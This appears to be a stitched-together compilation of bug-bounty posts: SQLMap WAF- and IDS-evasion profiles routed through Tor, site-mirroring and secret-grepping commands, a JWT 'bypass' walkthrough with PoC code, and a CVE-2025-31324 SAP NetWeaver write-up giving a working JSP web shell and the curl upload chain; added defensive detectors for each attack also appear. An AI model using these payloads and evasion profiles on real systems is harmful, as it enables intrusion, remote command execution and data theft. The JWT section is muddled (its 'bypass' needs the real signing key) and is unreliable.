Here's a powerful list of SQLMap preconfigured profiles you can use for stealthy SQL injection, especially when dealing with WAFs, rate-limits, or intrusion detection systems (IDS/IPS).
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.

1. Stealth Mode (WAF Bypass + Delay)
Use Case: Slow, stealthy testing to avoid WAF/IPS.
```bash
sqlmap -u "http://target.com/page.php?id=1" \
  --random-agent \
  --tamper=space2comment,between,charunicodeescape \
  --delay=2 --timeout=10 \
  --retries=5 \
  --threads=1 \
  --technique=BEUSTQ \
  --level=3 --risk=2
```

2. Aggressive Mode with WAF Evasion
Use Case: For deeper exploitation when stealth is less critical.
```bash
sqlmap -u "http://target.com/page.php?id=1" \
  --random-agent \
  --tamper=space2comment,charencode,unmagicquotes,versionedmorekeywords \
  --level=5 --risk=3 \
  --batch --threads=5 \
  --technique=BEUSTQ
```

3. Blind Time-Based SQLi Detection
Use Case: For blind injections using SLEEP, benchmark, or pg_sleep.
```bash
sqlmap -u "http://target.com/page.php?id=1" \
  --random-agent \
  --tamper=space2comment,modsecurityversioned,between \
  --technique=T \
  --time-sec=5 \
  --level=5 --risk=3 \
  --batch
```

4. Obfuscated Payloads for Bypassing WAFs
Use Case: When facing intelligent WAFs that detect classic patterns.
```bash
sqlmap -u "http://target.com/page.php?id=1" \
  --tamper=charunicodeescape,randomcase,space2comment,versionedkeywords \
  --random-agent \
  --level=5 --risk=3 \
  --threads=1 --delay=1 \
  --batch
```

5. POST Parameter Injection with Custom Headers
Use Case: Bypassing login forms and tricking WAFs using header spoofing.
```bash
sqlmap -u "http://target.com/login.php" \
  --data="username=admin&password=1234" \
  --method=POST \
  --headers="X-Forwarded-For: 127.0.0.1" \
  --random-agent \
  --tamper=space2comment,charunicodeescape \
  --level=5 --risk=3 \
  --batch
```

6. Using TOR with WAF Evasion
Use Case: Anonymous testing through TOR while bypassing WAF.
```bash
sqlmap -u "http://target.com/page.php?id=1" \
  --tor --tor-type=SOCKS5 --check-tor \
  --random-agent \
  --delay=2 --timeout=10 \
  --tamper=space2comment,charunicodeescape,modsecurityversioned \
  --batch
```

Recommended Tamper Scripts

| Tamper Script | Description |
| --- | --- |
| `space2comment` | Replaces spaces with comments (`/**/`) |
| `charunicodeescape` | Unicode-escapes payload characters |
| `randomcase` | Randomizes keyword casing |
| `between` | Obfuscates `WHERE` conditions |
| `versionedkeywords` | Adds versioned comments before SQL keywords |
| `equaltolike` | Replaces `=` with `LIKE` |
| `unmagicquotes` | Bypasses magic quotes |
| `modsecurityversioned` | Targets ModSecurity WAF bypass |

Bonus: Create a Custom Profile Alias
You can create a .sqlmap_profile file to reuse flags:
```text
# ~/.sqlmap_profile
--random-agent
--tamper=space2comment,charunicodeescape
--level=5
--risk=3
--threads=1
--delay=1
--timeout=10
--retries=3
--technique=BEUSTQ
```
Then run:
```bash
sqlmap -u "http://target.com/page.php?id=1" @~/.sqlmap_profile
```
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
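The defender-side counterpart to the tamper scripts listed above, added here as an example that is not part of the original post: a request parameter is canonicalised by undoing the transformations these scripts apply (URL encoding from `charencode`, `\uXXXX` escapes from `charunicodeescape`, `/**/` from `space2comment`, versioned comments from `versionedkeywords`/`modsecurityversioned`, mixed case from `randomcase`) and only then matched against a small set of signatures. The signature set and the sample inputs are constructed for illustration; a production WAF or IDS rule set is far larger.

```python
import re
from urllib.parse import unquote

# Constructed signatures, evaluated on the canonical form only.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b.{0,20}\bselect\b"),
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\("),
    # Also catches the forms produced by the 'between' and 'equaltolike' tampers.
    "boolean-or": re.compile(r"\bor\b\s*\d+\s*(=|like|between)\s*\d+"),
}
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
VERSIONED_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)  # /*!50000SELECT*/ -> SELECT
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)               # /**/ -> single space


def canonicalize(value: str) -> str:
    """Undo the tamper transformations so every variant collapses to one normal form."""
    v = value
    for _ in range(2):                       # charencode may sit on top of normal URL encoding
        v = unquote(v)
    v = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), v)  # charunicodeescape
    v = VERSIONED_COMMENT.sub(r" \1 ", v)    # MySQL executes the keyword inside /*!NNNNN ... */
    v = PLAIN_COMMENT.sub(" ", v)            # space2comment
    v = v.lower()                            # randomcase
    return re.sub(r"\s+", " ", v).strip()


def detect(value: str):
    """Return the names of all signatures the canonicalised value matches."""
    canon = canonicalize(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(canon)]


if __name__ == "__main__":
    # Constructed samples: obfuscated payloads next to benign parameter values.
    for sample in ("1/**/UNION/**/SELECT/**/1,2", "1%20AND%20SLEEP(5)", "42", "Smith & Sons"):
        print(repr(sample), "->", detect(sample))
```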
```bash
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://target.com
```
- Analyze JavaScript files for hidden secrets, tokens, or API endpoints
- Discover hidden or forgotten pages like /admin, /test, etc.
- Search HTML comments for sensitive dev notes
- Browse and inspect the full site locally without triggering WAFs or rate limits
```bash
grep -Ri "<!--" target.com   # Developer comments
grep -Ri "api" target.com    # API endpoints
python3 LinkFinder.py -i index.html -o cli
```
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
#wget
API Authentication Bypass
Let's assume we have a vulnerable API endpoint:
```
https://example.com/api/v1/users
```
The API uses JSON Web Tokens (JWT) for authentication. We can use a tool like Burp Suite to intercept and manipulate the JWT token.

Step 1: Intercept JWT Token
Using Burp Suite, intercept the login request and capture the JWT token:
```http
GET /api/v1/login HTTP/1.1
Host: example.com
Content-Type: application/json

{"username": "user", "password": "pass"}
```
Response:
```http
HTTP/1.1 200 OK
Content-Type: application/json

{"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"}
```

Step 2: Analyze JWT Token
Using a tool like jwt.io, we can analyze the JWT token and find the algorithm used (HS256) and the payload:
```json
{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1643723900,
  "exp": 1644329700
}
```

Step 3: Bypass Authentication
We can use a tool like jwt_tool to generate a new JWT token with the same payload but with a longer expiration time (e.g., 1 year):
```bash
jwt_tool --alg HS256 --payload '{"sub": "1234567890", "name": "John Doe", "iat": 1643723900, "exp": 2147483647}' --secret-key 'your_secret_key_here'
```
This will generate a new JWT token with a longer expiration time. We can use this token to bypass authentication:
```http
GET /api/v1/users HTTP/1.1
Host: example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
```

PoC Code
```python
import jwt
import requests  # used below; the import was missing from the original listing

# Load secret key
with open('secret_key.txt', 'r') as f:
    secret_key = f.read().strip()

# Generate new JWT token with longer expiration time
payload = {'sub': '1234567890', 'name': 'John Doe', 'iat': 1643723900, 'exp': 2147483647}
new_token = jwt.encode(payload, secret_key, algorithm='HS256')
# PyJWT >= 2.0 returns str; older releases return bytes, which is what the original .decode() assumed
if isinstance(new_token, bytes):
    new_token = new_token.decode()

# Use new token to bypass authentication
headers = {'Authorization': f'Bearer {new_token}'}
response = requests.get('https://example.com/api/v1/users', headers=headers)
print(response.text)
```
Note: This is just a basic example and should not be used in production. In a real-world scenario, you should use a more sophisticated approach to bypass authentication.
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
#wget #api
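The server-side check that defeats the long-lived token minted in Step 3, added here as an example that is not part of the original post: a stdlib-only HS256 verifier that pins the algorithm instead of trusting the token's `alg`, compares the signature in constant time, and rejects any token whose `exp - iat` exceeds a policy maximum, so a re-signed `exp` of 2147483647 fails even when the signer holds the real key. `MAX_LIFETIME`, the secret and the sample tokens are constructed for this example.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional, Tuple

MAX_LIFETIME = 24 * 3600              # constructed policy: no token may be valid for more than 24 h
SECRET = b"constructed-demo-secret"   # constructed for this example only

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def mint_hs256(payload: dict, secret: bytes) -> str:
    """Produce sample tokens of the same shape as the post's token, for the checks below."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"

def verify_hs256(token: str, secret: bytes, now: Optional[int] = None) -> Tuple[bool, str]:
    """Return (accepted, reason); the reason names the first failed check."""
    now = int(time.time()) if now is None else now
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        payload = json.loads(_b64url_decode(body_b64))
    except (ValueError, UnicodeDecodeError):
        return False, "malformed token"
    if not isinstance(header, dict) or not isinstance(payload, dict):
        return False, "malformed token"
    # Pin the algorithm server-side; never let the client choose it (blocks alg=none as well).
    if header.get("alg") != "HS256":
        return False, "algorithm not allowed"
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return False, "bad signature"
    exp, iat = payload.get("exp"), payload.get("iat")
    if not isinstance(exp, int) or not isinstance(iat, int):
        return False, "exp/iat missing"
    if now >= exp:
        return False, "expired"
    # The check the post's 'exp': 2147483647 token fails even with a valid signature.
    if iat > now + 60 or exp - iat > MAX_LIFETIME:
        return False, "lifetime exceeds policy"
    return True, "ok"
```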
This command extracts all JavaScript files from a given target using getJS, then downloads and scans them for sensitive keywords such as apikey, token, or secret.
JavaScript files often contain hidden endpoints, API keys, tokens, or sensitive configuration data. This command helps bug bounty hunters automate the discovery of potential security misconfigurations or leaked secrets exposed in frontend code.
```bash
getJS --url https://target.com | xargs -I@ curl -s @ | grep -Ei 'apikey|token|secret'
```
Zero-Day Vulnerability CVE-2025-31324 in SAP NetWeaver Platform: A Critical Analysis
The CVE-2025-31324 vulnerability in the SAP NetWeaver platform is a critical zero-day vulnerability that allows for unauthenticated Remote Code Execution (RCE). It is exploited by targeting a weakness in the Metadata Uploader feature of the Visual Composer component.

1. What is SAP NetWeaver?
The SAP NetWeaver platform is an integrated technology architecture produced by SAP SE. It serves as the foundation for building and operating enterprise business applications. It combines database management, application runtime, system integration, service development, and user interface functions into a single system. It provides tools for integrating applications and information across different environments and systems.
The NetWeaver platform is the heart of modern SAP systems and enables:
In short, it is a technical platform for running, developing, and integrating major business applications in enterprises, forming the backbone of the SAP ecosystem for companies worldwide.

2. How Attackers Find Vulnerable Systems
Attackers locate affected SAP NetWeaver platforms using various network scanning and information gathering techniques and tools, the most important of which are:
```
http.title:"SAP NetWeaver Application Server"
```

3. Detailed Vulnerability Explanation
Affected Component: SAP NetWeaver Application Server Java, Visual Composer module.
Exploitation Method: The problem lies in a Missing Authorization Check.
What happens during exploitation: The system accepts the file upload without properly verifying the user's authorization or checking the file securely, leading to the possibility of executing malicious code and gaining full control of the server (RCE) remotely.
Severity Level: CVSS 10/10 (CRITICAL)

4. Impact and Attack Targets
Wide Spread: There are over 1200 SAP NetWeaver systems exposed to the internet worldwide that are at risk.
Exploitation Examples:
- Uploading a malicious Web Shell to the folder `j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/` and then accessing it to execute commands via GET requests.
- Stealing sensitive customer or financial data.
- Disrupting business activities.
- Lateral movement within the network and compromising other systems.

Attack Workflow:
1. The attacker prepares a malicious file (e.g., a Web Shell, a JAR or ZIP file embedded with malicious code).
2. They send this file as part of an HTTP POST request to a path like:
```
/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader
```
3. The SAP NetWeaver server, due to the missing authorization check, accepts the file and stores/executes it as part of its system.
4. The attacker then follows up with an HTTP GET request to the Web Shell file (or executes Java code or other code), beginning their full control over the system.
5. The attacker can now execute any commands, steal data, or move laterally within the network.

5. Tools Used for Sending POST Requests
Attackers use specialized tools that allow them to formulate and send HTTP requests manually or automatically. The most famous tools used are:

curl
- A command-line tool available on Linux (and all major systems) that allows sending custom HTTP/HTTPS requests.
- Example usage:
```bash
curl -k -X POST -F "file=@webshell.jsp" https://target-sap-server/metadatauploader
```

Burp Suite
- An advanced penetration testing tool that allows the attacker or security tester to intercept, examine, and modify any HTTP request (GET/POST).
- They can modify requests directly through the UI or use tools like Repeater/Intruder to send multiple different requests and observe responses.

Postman
- A comprehensive application for sending HTTP requests and API development. It allows sending files, modifying fields and headers, and analyzing responses.
- Often used for manual testing to see the response and repeat requests.

Custom Scripts in Python/JavaScript
- An advanced attacker might write a custom script using libraries like requests (Python) or axios (JavaScript) to send automated POST requests according to their attack scenario.

6. Technical Steps for Exploitation (For Study & Understanding Only)
Warning: These steps are shown for educational and awareness purposes only, and not for actual illegal application.

1. Prepare a Malicious File
The file could be a Web Shell in JSP, for example:
```jsp
<% if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    java.io.InputStream in = p.getInputStream();
    int a = -1;
    while((a=in.read())!=-1){
        out.print((char)a);
    }
    in.close();
} %>
```

2. Send a POST Request to Upload the File
Using a tool like curl:
```bash
curl -k -X POST \
  -F "file=@webshell.jsp" \
  https://target-sap-server/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader
```

3. Access the File After Upload
Visit the path where the file is stored (example):
```
https://target-sap-server/irj/go/km/docs/webshell.jsp?cmd=whoami
```
The command will be executed and the result returned on the page, confirming that the attacker has gained full control of the server.

Disclaimer: This information is provided for educational and awareness purposes only. Unauthorized testing or exploitation of systems you do not own is illegal.
That's all, friends!
Happy hacking and see you next time!
#BugBounty #ssrf
#sqli #bypass
#api
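A detection for the two observable stages of the attack workflow described above, added here as an example that is not part of the original post: it walks web-server access logs in Common Log Format (an assumed log source, e.g. a reverse proxy in front of the portal) and flags POST requests to the metadata uploader path quoted in the write-up, and GET requests to a JSP under `/irj/` carrying a `cmd` parameter, the invocation pattern shown in step 3. The `cmd` parameter name comes from the post; treating every `/irj/` JSP as in scope is an assumption, and the log lines are constructed.

```python
import re
from typing import Dict, List

# Path taken from the write-up above; the missing authorization check sits behind it.
UPLOADER_PATH = "/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader"
PORTAL_PREFIX = "/irj/"        # assumption: uploaded JSPs are reached somewhere under the portal root
SHELL_PARAMS = {"cmd"}         # parameter name used by the web shell in the post

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyze(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per log line that matches either stage of the workflow."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not CLF; skip rather than guess
        path, _, query = m["target"].partition("?")
        params = {kv.split("=", 1)[0].lower() for kv in query.split("&") if kv}
        rule = None
        # Stage 2: file upload to the unauthenticated metadata uploader (any status is worth a look;
        # a 2xx means the server accepted the request).
        if m["method"] == "POST" and path.lower() == UPLOADER_PATH:
            rule = "metadatauploader POST"
        # Stage 4: a JSP under the portal root invoked with a command parameter.
        elif (m["method"] == "GET" and path.lower().startswith(PORTAL_PREFIX)
              and path.lower().endswith(".jsp") and params & SHELL_PARAMS):
            rule = "jsp invoked with command parameter"
        if rule:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], "path": path, "rule": rule})
    return findings


# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Apr/2025:10:01:02 +0000] "POST /irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/Apr/2025:10:01:09 +0000] "GET /irj/go/km/docs/helper.jsp?cmd=whoami HTTP/1.1" 200 64',
    '198.51.100.4 - - [24/Apr/2025:10:02:00 +0000] "GET /irj/portal HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```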